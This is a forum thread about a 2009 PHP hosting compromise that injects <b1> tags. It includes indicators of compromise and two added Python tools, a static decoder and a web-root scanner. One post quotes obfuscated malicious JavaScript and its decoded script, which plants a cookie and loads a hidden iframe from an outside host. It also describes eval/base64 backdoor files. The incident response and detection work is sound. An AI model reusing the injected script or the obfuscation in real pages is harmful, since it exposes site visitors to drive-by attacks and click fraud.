suess0r Posted October 27, 2009
I recently noticed some odd HTML appear in some of the websites I host. Not all of them are run on a CMS but the majority (but not all) are running through the same FTP account. I've searched everywhere for documentation, forums, notes on this particular exploit but haven't been able to find anything. Essentially, there is a small HTML snippet (see below) that appears right before the </html> tag. It's really odd and the characters inside the <b1> are all different strings. Here's the code that's appearing:
<b1><!--6FY8rhRLeNoNyVsOwiAQBdAdca0PXE5DYVKngSkZrsG4ej2/B80UJt+FlytuMcbnHbmqHEcoMnS3r9aaRshnw5QN+TT+F7NMUFqviTLgXCnuyei6vU3WY3lArcgn9Ff/AVyxJcZ=--></b1>
It's evident that the code is some type of exploit but I'm not sure how deep this goes. Anyone heard of anything like this, or have any idea of what potential issues could occur? Thanks for your help! -suess0r
Link to comment https://forums.phpfreaks.com/topic/179128-strange-html-tag/
abazoskib Posted October 27, 2009
Maybe it's XML? I know some hosts add code to your pages; for example, GoDaddy adds a Doctype, head, and body tags to HTML if they are missing.
suess0r Posted October 27, 2009 (Author)
Interesting. I've contacted our hosting provider and they swear up and down they wouldn't have inserted that into the code. Oddly enough we've been hosting these sites for 2+ years on this particular server and haven't noticed this until now. I would like to assume it's not anything dangerous, but the way it has spread itself onto the websites with the same FTP login credentials leads me to believe otherwise. Oddly enough I haven't found anything on Google about a <b1> HTML tag, so perhaps I'll dig around for XML to see. Any additional comments / suggestions would be great. Thanks!
abazoskib Posted October 27, 2009
Maybe this will help: http://www.google.com/support/forum/p/blogger/thread?tid=0d6dbe12fc52a7cf&hl=en
I couldn't read through the whole thing but it seems worthy of a try.
jkewlo Posted October 27, 2009
Might be a bot <bot1>
typedeaf Posted October 27, 2009
Your site has been compromised. I recommend that you search for all files and directories that are world writable. I believe this will be what was exploited. Also, look for a file called 'data' somewhere and another file that contains PHP code that is mainly a variable that is base64 encoded and then eval'ed. Get rid of those. This is something that I have been investigating today and yesterday. That string between the bogus <b1> tag is a concatenation of compressed and encoded strings. I am not yet sure how it is being used by the attacker. typedeaF
suess0r Posted October 27, 2009 (Author)
Thanks typedeaf. We've found a similar conclusion and have been investigating this based on the attack on at least 2 fronts (and it sounds like 3 from what you've informed me):
1.) The bot embeds itself onto various files (such as index.php, footer.php, etc.) that include <body> or </body> tags. The bot adds the following snippet of code before the </body>: <b1></b1> with a random string between that we can only presume is our FTP credentials or some other login details.
2.) The controller file: we've found that the file (the PHP that actually makes use of the <b1> tags) is buried randomly and discreetly within various directories. We've found 3 of these dirs and each one was different. The common thread on the controller files is that they embed themselves within sub-directories of ones that have 777 privileges (such as an image dir, etc.). The directories also appear to share the same Owner and Owner Group, which we are researching further.
I have seen a misc file called 'data' that I'll have to look out for also and get rid of.
Type, have you seen this on other websites or encountered this yourself? Have you had any luck decrypting any of the encoded strings?
mrMarcus Posted October 27, 2009
Don't worry about decrypting; rest assured it's malicious in one way or another. Probably an IFRAME executing a script to embed links back to different sites; people use that method to try and gain better rankings in Google. It can get you banned from Google if that's the case. Anyways, change your FTP and account password, secure ALL forms and SQL on your site; this includes all $_POST variables, etc. CHMOD all your directories to read only, using the CHMOD command to open a directory for writing only when needed (can be done with PHP). Make sure to use SSH2 or greater to connect to your FTP; anything less and you might as well invite the bad guys over for a schmoke and a pancake. That should keep you busy.
mx209 Posted October 27, 2009
Had the same B1 problem today; judging from other comments it looks like it's going around. We have one FTP account that is used from one location so not sure how this happened.
- mostly index.php and index.htm files touched
- some .xml (I guess ones with HTML inside)
- handful of other PHP files affected (had to contain HTML)
- looking at the XML files affected, it seemed it found a HTML block and put the following after it:
<b1><!--em5MZER2eNoly1EKgCAQRdEV5ZPKqOWYDiU0DsQLW35Cv/dwoZVgvA+hHzEFP68BWdRcK7lHjSzJJVM02ZGsUvqw+A2/D+dDWnWvXh/JFhpm--></b1></body></html>
Our ISP isn't being very helpful on this one. Has anyone found out how their systems were compromised? Is this via FTP, injection?
mrMarcus Posted October 28, 2009
How do you connect to your FTP client? What type of connection method are you using? Not saying this is the problem, but I've seen it happen before.
mx209 Posted October 28, 2009
Thanks for asking. Before today, we used regular FTP. After your suggestion I have switched to SFTP. If my ISP had the smarts to look at the IPs they could probably tell me if someone other than me accessed the site; we have one FTP account and only use it from one location. Can you share who your ISP is (first letter perhaps)? This may be ISP specific/related.
mrMarcus Posted October 28, 2009
You mean web host? I don't believe an ISP would have anything to do with it. I have sites hosted on HostGator.
suess0r Posted October 28, 2009 (Author)
mx209 - who are you hosting with? Marcus, we're thinking that we were exploited through a Joomla 1.0 site that we were hosting that had some 777 directories open. We're in the process of eliminating, securing, and running various test cases on our file trees. Unfortunately, we don't have SSH access to our server to make it easier to secure these directories. Does anyone have any suggestions for running a massive search for all directories that are set to 777 without SSH?
mx209 Posted October 28, 2009
Mosso is my hosting provider. As far as 777 is concerned: I know directories should NOT have this permission, but is it an issue if some files do?
mrMarcus Posted October 28, 2009
Of course it can be. 777 gives full read/write/execute permissions to a file or folder.
typedeaf Posted October 29, 2009
Quoting mrMarcus:
> Don't worry about decrypting; rest assured it's malicious in one way or another. Probably an IFRAME executing a script to embed links back to different sites; people use that method to try and gain better rankings in Google. It can get you banned from Google if that's the case. Anyways, change your FTP and account password, secure ALL forms and SQL on your site; this includes all $_POST variables, etc. CHMOD all your directories to read only, using the CHMOD command to open a directory for writing only when needed (can be done with PHP). Make sure to use SSH2 or greater to connect to your FTP; anything less and you might as well invite the bad guys over for a schmoke and a pancake. That should keep you busy.
While that is good advice, it is inaccurate in this case. The information between the tags is not malicious. I have thoroughly researched this attack. There are 3 other things to look for:
1) a PHP file containing a variable whose value is a long string of base64 encoded and compressed characters, followed by a single eval statement. This is the remote control file and it is further obfuscated.
2) a plain text file called 'data'. It contains the full path to files that are world writable that it has found.
3) .htaccess file. The contents seem to vary as there are many revisions of this infector out there.
The attack vector is verified to be world writable files and directories, in every case that I have examined. The data between the tag is random characters followed by the path to the current file, both base64 encoded and compressed. This is quite harmless, but my expectation is that the current tag is a proof of concept that will eventually be sold on the black market to profit from pay-per-click links that can be embedded. I hope this clears a lot of things up. I work security for Mosso/Rackspace Cloud Sites and we are fully investigating and aware of this issue.
Best protection against this: lock down your file permissions. typedeaF
kkovacsb Posted October 30, 2009
A few days ago I also found this problem on a few of my sites hosted at Mosso. However I don't seem to find any file called "data", any PHP file that I did not put there, nor any modifications in the .htaccess files. I cleaned all files of the <b1> tags and it was OK for a day; now they seem to be back again. I had one or two folders with 777 and now I CHMODed them to 775. I hope this solves the problem but it still bothers me that I can't find the above mentioned files...
keldorn Posted October 30, 2009
Yeah, as the guy above mentioned, it looks like a Base64 string. This is why shared hosting is no good. You don't know what the hell is going on in the server. Anything can happen. What if someone buys some hosting and uploads C99shell.php and the customer now has access to the whole hard drive? I've heard these so many times, and every time it's something to do with shared hosting. I have a dedicated server; this is why I won't sell any of my space to anybody. It's not worth the risk. This whole programming server language thing just doesn't work when it's shared; if it's just static files and .html it's fine, but with PHP and such you can upload a programming file that does stuff it shouldn't be doing... That's why all you guys who say you have experience with your sites getting hacked, it's probably because you're on shared hosting. It's because the hacker got in from somebody else's insecure site, or the shared customer themselves was a hacker who bought a shared hosting package just to hack the server. The least you can do is get a VPS. You can get those for 50 a month. If you can afford that you should be running a website anyway that's running PHP. If you want to learn, host it yourself on a home computer and put a LAMP stack on it. </rant>
keldorn Posted October 30, 2009
BTW, on my dedicated server I get a dozen hackers every day trying to brute force my SSH login from different IPs that come from all over the world (probably proxies of more hacked machines). So yeah, hackers are out, working full time to break into any systems they can. If you use shared hosting you may as well consider it compromised from day one. You'd better keep backups constantly updated. Keldorn.
mx209 Posted November 5, 2009
Ditto to the problem on Mosso. I cleaned everything up, locked everything down, switched from FTP to SFTP. Disabled every other login; only have one, used from one location. Problem was back today.
pillageTHENburn Posted January 18, 2010
I'm not sure how helpful this will be but I have recently become aware of a strange <b1> tag at the bottom of pages on a client's site. Based on suggestions here I found a data.js file that was suspect. Here's what it looked like (this is just a part of the file):
function KjkyExwkp(VjXbQk){ fff=op.split("228"); fff.op.replace("241"); }
function MFBURYbuI(RmLDD){var HqH=5,ySHuxFH=3;var XZqq='100-0+191-2+165-0+190-0+175-0+186-2+193-1+103-1+175-0+170-0+66-2+166-2+185-0+165-0+195-0+181-2+168-1+183-1+193-1+76-2+165-0+185-0+185-0+178-1+175-0+168-1+76-2+175-0+183-1+166-2+168-1+200-0+131-2+170-0+66-2+56-2+195-0+190-0+165-0+173-1+175-0+183-1+56-2+68-1+101-2+101-2+75-0+81-2+53-1+63-1+',Izxvlerz=XZqq.split('+');wOSvDc='';for(sLWsEAW=0x2f-0x2b-0x4;sLWsEAW<Izxvlerz.length-1;sLWsEAW+=-0x1f+0x29+0x7+0x4+0x30-0xa-0x3a){ pSG=Izxvlerz[sLWsEAW].split('-');ESlbi = parseInt(pSG[0]*ySHuxFH)+parseInt(pSG[1]);ESlbi = parseInt(ESlbi)/HqH;wOSvDc += String.fromCharCode(ESlbi);}return wOSvDc;}
function mzE(qojwufyo){ var yxpaZGQKfG=new Function("gZTgwqhug", "return 743469;"); }
There were 10 main functions each with its own huge string of numbers. Through trial and error I figured out how to "decipher" these functions into something readable. Concatenated together this is what I got:
<script>
if(document.cookie.indexOf("urchin")==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex)/)){
  res=new Date();
  res.setTime(res.getTime()+80000000);
  document.cookie="urchin="+escape("google-analytics.com")+";expires="+res.toGMTString()+";path=/";
  document.write("<iframe width=1 height=1 border=0 frameborder=0 src='http://yourclicker.com/in.cgi?2'></iframe>");
}
</script>
Aside from being confirmation that this is bad/malicious code I don't really know what this accomplishes. I still don't know what the <b1> tags are or how they work or what they are doing.
The strings inside the tags are different on each page so find and replace isn't going to help me here. Oh well. I hope this helps someone. Just remembered Dreamweaver's "find specific tag" option! That'll save some time!
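The decoding step pillageTHENburn worked out by trial and error can be read straight off the obfuscated function: each `a-b` pair becomes the character code `(a*ySHuxFH + b) / HqH`, so for this sample `(100*3 + 0) / 5 = 60`, which is `<`. The script below is an added example (not from the post, nor from the malware) that reimplements that arithmetic in Python and pulls the two constants, the encoded string and their roles out of each function with regular expressions, so the ten functions of a file like this can be decoded in one pass without running any of it. The regular expressions assume the layout seen in the quoted function (`var A=n,B=m;`, a quoted digit string, `[0]*B)` and `)/A;`); `SAMPLE_JS` is a copy of the function from the post.

```python
import re

# Copy of the obfuscated function quoted in the post above (the decoy
# function and the mzE stub around it are left out of this string).
SAMPLE_JS = r"""function MFBURYbuI(RmLDD){var HqH=5,ySHuxFH=3;var XZqq='100-0+191-2+165-0+190-0+175-0+186-2+193-1+103-1+175-0+170-0+66-2+166-2+185-0+165-0+195-0+181-2+168-1+183-1+193-1+76-2+165-0+185-0+185-0+178-1+175-0+168-1+76-2+175-0+183-1+166-2+168-1+200-0+131-2+170-0+66-2+56-2+195-0+190-0+165-0+173-1+175-0+183-1+56-2+68-1+101-2+101-2+75-0+81-2+53-1+63-1+',Izxvlerz=XZqq.split('+');wOSvDc='';for(sLWsEAW=0x2f-0x2b-0x4;sLWsEAW<Izxvlerz.length-1;sLWsEAW+=-0x1f+0x29+0x7+0x4+0x30-0xa-0x3a){ pSG=Izxvlerz[sLWsEAW].split('-');ESlbi = parseInt(pSG[0]*ySHuxFH)+parseInt(pSG[1]);ESlbi = parseInt(ESlbi)/HqH;wOSvDc += String.fromCharCode(ESlbi);}return wOSvDc;}"""

# Layout assumptions (mine), taken from the sample function above.
CONST_RE = re.compile(r"var\s+(\w+)=(\d+),(\w+)=(\d+);")   # var HqH=5,ySHuxFH=3;
STRING_RE = re.compile(r"var\s+\w+='([\d+\-]+)'")          # var XZqq='100-0+...'
MUL_RE = re.compile(r"\[0\]\*(\w+)\)")                      # parseInt(pSG[0]*MUL)
DIV_RE = re.compile(r"parseInt\(\w+\)/(\w+);")              # parseInt(x)/DIV;


def decode_pairs(encoded, mul, div):
    """Turn 'a-b+a-b+...' into text: chr((a*mul + b) // div) per pair."""
    chars = []
    for pair in encoded.split("+"):
        if not pair:                 # the trailing '+' leaves an empty item
            continue
        a, b = pair.split("-")
        chars.append(chr((int(a) * mul + int(b)) // div))
    return "".join(chars)


def decode_function(js):
    """Decode one function body; None if it carries no payload (decoy)."""
    consts = CONST_RE.search(js)
    payload = STRING_RE.search(js)
    mul = MUL_RE.search(js)
    div = DIV_RE.search(js)
    if not (consts and payload and mul and div):
        return None
    values = {consts.group(1): int(consts.group(2)),
              consts.group(3): int(consts.group(4))}
    return decode_pairs(payload.group(1), values[mul.group(1)], values[div.group(1)])


def decode_file(js):
    """Decode every function in a file and join the pieces in order."""
    pieces = []
    for chunk in js.split("function ")[1:]:
        text = decode_function(chunk)
        if text is not None:
            pieces.append(text)
    return "".join(pieces)


if __name__ == "__main__":
    print(decode_file(SAMPLE_JS))
```

On the sample this yields `<script>if(document.cookie.indexOf("urchin")==-1 &`, the opening of the script the post reconstructs; the remaining functions of the real file supply the rest. Doing the decode statically, rather than pasting the functions into a browser, keeps the dropped iframe from ever loading.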
sillyRabbit Posted August 26, 2010
Having a similar issue. Found suspicious looking PHP scripts and a file named 'data' in the images folder. The files were:
ready.php .... contains what appears to be a backdoor to execute PHP
file.php .... probably called in ready.php; looks like it is what adds the b1 hack code to files designated in data
jpg.php .... probably called in ready.php and again looks like it is what adds the b1 hack code to files designated in data
and the 'data' file ... called in both file.php and jpg.php; lists which files get hacked
I have removed these files from the server. Have to wait and see if they return or if the hack returns.
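A triage script for the indicators collected in this thread, added here as an example and not code from any poster or host: typedeaf's list (world-writable files and directories, a file named 'data', a PHP file pairing a long base64 string with `eval`, a changed `.htaccess`) plus the file names sillyRabbit reports (ready.php, file.php, jpg.php). It assumes it is run on a machine that can see the web root with its real permission bits (the host's shell, or a cron job); on a copy pulled down over FTP only the content checks are meaningful. The `build_demo_tree` helper creates a constructed directory layout so the scanner can be exercised without a real infection.

```python
import os
import re
import shutil
import stat
import sys
import tempfile

B1_TAG_RE = re.compile(rb"<b1><!--[^>]*?--></b1>")
EVAL_RE = re.compile(rb"\beval\s*\(")
LONG_B64_RE = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")     # "long base64 string"
SUSPECT_NAMES = {"data", "ready.php", "file.php", "jpg.php"}  # names from the thread
TEXT_EXT = {".php", ".htm", ".html", ".xml", ".js", ".inc"}


def is_world_writable(path):
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def scan_tree(root):
    """Walk root and return (kind, path) findings for each indicator."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if is_world_writable(dirpath):
            findings.append(("world-writable-dir", dirpath))
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            if is_world_writable(path):
                findings.append(("world-writable-file", path))
            if name in SUSPECT_NAMES:
                findings.append(("suspect-name", path))
            if name == ".htaccess":               # contents vary; review by hand
                findings.append(("htaccess-review", path))
            ext = os.path.splitext(name)[1].lower()
            if ext not in TEXT_EXT:
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            if B1_TAG_RE.search(data):
                findings.append(("b1-tag", path))
            if ext == ".php" and EVAL_RE.search(data) and LONG_B64_RE.search(data):
                findings.append(("eval-base64-php", path))
    return findings


def build_demo_tree(root):
    """Constructed sample layout mirroring the thread's reports (test only)."""
    img = os.path.join(root, "images")
    os.makedirs(img)
    os.chmod(img, 0o777)                          # the open upload directory
    files = {
        "index.php": "<html><body>hi</body><b1><!--AAAAeNoBBB--></b1></html>",
        "about.html": "<html><body>clean</body></html>",
        ".htaccess": "RewriteEngine On\n",
        os.path.join("images", "data"): "/var/www/index.php\n",
        os.path.join("images", "ready.php"):
            "<?php $x='" + "QUJD" * 60 + "'; eval(base64_decode($x)); ?>",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, 0o644)                     # explicit mode, independent of umask


def demo():
    """Scan the constructed tree and return the set of indicator kinds hit."""
    root = tempfile.mkdtemp()
    try:
        build_demo_tree(root)
        return {kind for kind, _ in scan_tree(root)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        for kind, path in scan_tree(target):
            print(f"{kind:20} {path}")
    else:
        print(sorted(demo()))
```

Run as `python scan.py /path/to/webroot`. The `eval` heuristic is deliberately loose (any `eval(` next to 200+ base64 characters), because the thread says the controller file is "further obfuscated" and its exact form varies; expect to review the hits rather than delete on sight, and treat every `.htaccess` it lists as something to diff against a known-good copy.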
fortnox007 Posted August 26, 2010
It's base64 from the look of it, I think; it's probably a URL to a malicious site. But your site has been taken over, that's for sure.
Alex Posted August 26, 2010
Please don't bump topics that are several months old; instead just make a new one.